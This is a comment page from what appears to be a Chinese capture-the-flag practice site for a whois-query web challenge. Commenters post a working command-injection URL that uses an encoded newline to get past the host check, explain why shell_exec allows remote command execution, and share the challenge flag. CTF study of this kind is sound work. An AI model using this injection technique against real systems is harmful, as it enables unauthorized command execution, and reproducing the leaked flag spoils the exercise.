评分(0)
暂无评分
解题动态
yinbug 攻破了该题 1天前
15756309355 攻破了该题 1天前
wj834722134 攻破了该题 1天前
miko88 攻破了该题 2天前
竹盐笙熙 攻破了该题 3天前
1813692149 攻破了该题 3天前
NeilOvO 攻破了该题 3天前
crushyjp 攻破了该题 4天前
admin123456789qwer 攻破了该题 4天前
dulinping 攻破了该题 4天前
xlogsrc 攻破了该题 6天前
花落时相遇 攻破了该题 8天前
awoawo 攻破了该题 8天前
大器晚成鹏鹏 攻破了该题 9天前
bu5yer 攻破了该题 9天前
XmN<=GzR 攻破了该题 9天前
skyhigh 攻破了该题 11天前
zhz0013 攻破了该题 11天前
Jokerz 攻破了该题 12天前
评论
wj834722134 1天前
举报
host参数用%0a结尾,正则表达式/^[0-9a-zA-Z][0-9a-zA-Z\.-]+$/为什么能匹配成功?host字符串最后一位'\n'明明不在[0-9a-zA-Z\.-]范围内
Tao23 1月前
举报
query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
to5ny 2月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=ls /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
xzs297995 3月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
xiaoxiao972521 3月前
举报
/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
15614005380 5月前
举报
1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕
unknown237819 6月前
举报
在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令
868954104 7月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
vchopin 7月前
举报
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
yituoshi 8月前
举报
Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE